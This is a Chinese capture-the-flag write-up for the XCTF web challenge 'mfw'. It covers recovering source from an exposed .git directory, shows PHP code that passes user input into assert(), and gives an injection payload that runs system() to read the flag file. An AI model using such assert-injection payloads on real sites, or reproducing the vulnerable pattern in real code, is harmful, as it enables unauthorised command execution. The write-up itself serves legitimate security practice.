攻防世界-web-高手进阶区015-mfw

1.查看页面,发现网站使用的一些东西

 攻防世界-web-高手进阶区015-mfw_第1张图片

 

 

2.存在.git目录

 攻防世界-web-高手进阶区015-mfw_第2张图片

 

 

3.使用 GitHack获取源码

 攻防世界-web-高手进阶区015-mfw_第3张图片

 

 

4.index.php中关键代码如下

if (isset($_GET['page'])) {

    $page = $_GET['page'];} else {

    $page = "home";}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

 

如果这个字符串中没有找到相应的子字符串 就返回false//

TODO: Make this look niceassert("file_exists('$file')") or die("That file doesn't exist!");

?>

其中:

assert() 检查一个断言是否为 FALSE

strpos() 函数查找字符串在另一字符串中第一次出现的位置。如果没有找到则返回False

file_exists() 函数检查文件或目录是否存在。

assert()函数会将括号中的字符当成代码来执行,并返回truefalse

 

5.构造payload

?page=abc') or system("cat templates/flag.php");//

 攻防世界-web-高手进阶区015-mfw_第4张图片

 

你可能感兴趣的:(攻防世界-web-高手进阶区015-mfw)